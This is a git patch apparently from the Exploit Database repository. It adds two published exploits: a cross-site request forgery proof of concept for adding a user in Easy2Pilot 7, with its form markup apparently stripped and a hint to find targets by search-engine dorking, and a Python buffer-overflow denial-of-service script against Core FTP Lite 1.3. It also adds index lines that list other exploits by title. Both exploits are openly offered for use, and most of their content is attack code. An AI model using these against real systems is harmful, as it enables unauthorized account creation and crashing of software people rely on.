From ed6caf083703394a21f58c962a5c0ce1e51718a8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 21 Feb 2020 05:01:53 +0000 Subject: [PATCH] DB: 2020-02-21 2 changes to exploits/shellcodes Core FTP Lite 1.3 - Denial of Service (PoC) Easy2Pilot 7 - Cross-Site Request Forgery (Add User) --- exploits/php/webapps/48099.txt | 48 ++++++++++++++++++++++++++++++++++ exploits/windows/dos/48100.py | 28 ++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 78 insertions(+) create mode 100644 exploits/php/webapps/48099.txt create mode 100755 exploits/windows/dos/48100.py diff --git a/exploits/php/webapps/48099.txt b/exploits/php/webapps/48099.txt new file mode 100644 index 000000000..8dbd5175b --- /dev/null +++ b/exploits/php/webapps/48099.txt @@ -0,0 +1,48 @@ +# Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery (Add User) +# Author: indoushka +# Date: 2020-02-20 +# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) +# Vendor: http://easy2pilot-v7.com/ +# CVE: N/A + +#poc : + +[+] Dorking İn Google Or Other Search Enggine. + +[+] save code as poc.html + +[+] + + + + + + + +

+
+ + + + + + + + + + + + + + + +
Nouvel utilisateur :
Nom d'utilisateur :
Mot de passe :
+


+
+ + +Greetings to :========================================================================================================================= + | +jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | + | +======================================================================================================================================= \ No newline at end of file diff --git a/exploits/windows/dos/48100.py b/exploits/windows/dos/48100.py new file mode 100755 index 000000000..64c1ad2fb --- /dev/null +++ b/exploits/windows/dos/48100.py @@ -0,0 +1,28 @@ +# Exploit Title : Core FTP Lite 1.3 - Denial of Service (PoC) +# Exploit Author: Berat Isler +# Date: 2020-02-20 +# Vendor Homepage: http://www.coreftp.com/ +# Software Link Download:http://tr.oldversion.com/windows/core-ftp-le-1-3cbuild1437 +# Version: Core FTP 1.3cBuild1437 +# Tested on : Windows 7 32-bit + +# First step , Run exploit script, it will generate a new file with the name "mi.txt" +# Then start Core FTP application and find the "username" textbox. +# After that pate the content of "mi.txt" in to the "username" field like this --> "AAAAAAAAA" +# Don't need to click anything because application is already crash. + +This is the code : + + +#!/usr/bin/python + +b0f = "A" * 7000 +payload = b0f +try: + f=open("mi.txt","w") + print "[+] Creating %s bytes payload generated .. .. .." %len(payload) + f.write(payload) + f.close() + print "[+] File created :) " +except: + print "File cannot be created :((" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d85c81a3f..e6dc7ab1f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6678,6 +6678,7 @@ id,file,description,date,author,type,platform,port 48031,exploits/windows/dos/48031.txt,"Dota 2 7.23f - Denial of Service (PoC)",2020-02-10,"Bogdan Kurinnoy",dos,windows, 48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux, 48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple, +48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -42376,3 +42377,4 @@ id,file,description,date,author,type,platform,port 48094,exploits/php/webapps/48094.py,"Virtual Freer 1.58 - Remote Command Execution",2020-02-19,SajjadBnd,webapps,php, 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware, 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware, +48099,exploits/php/webapps/48099.txt,"Easy2Pilot 7 - Cross-Site Request Forgery (Add User)",2020-02-20,indoushka,webapps,php,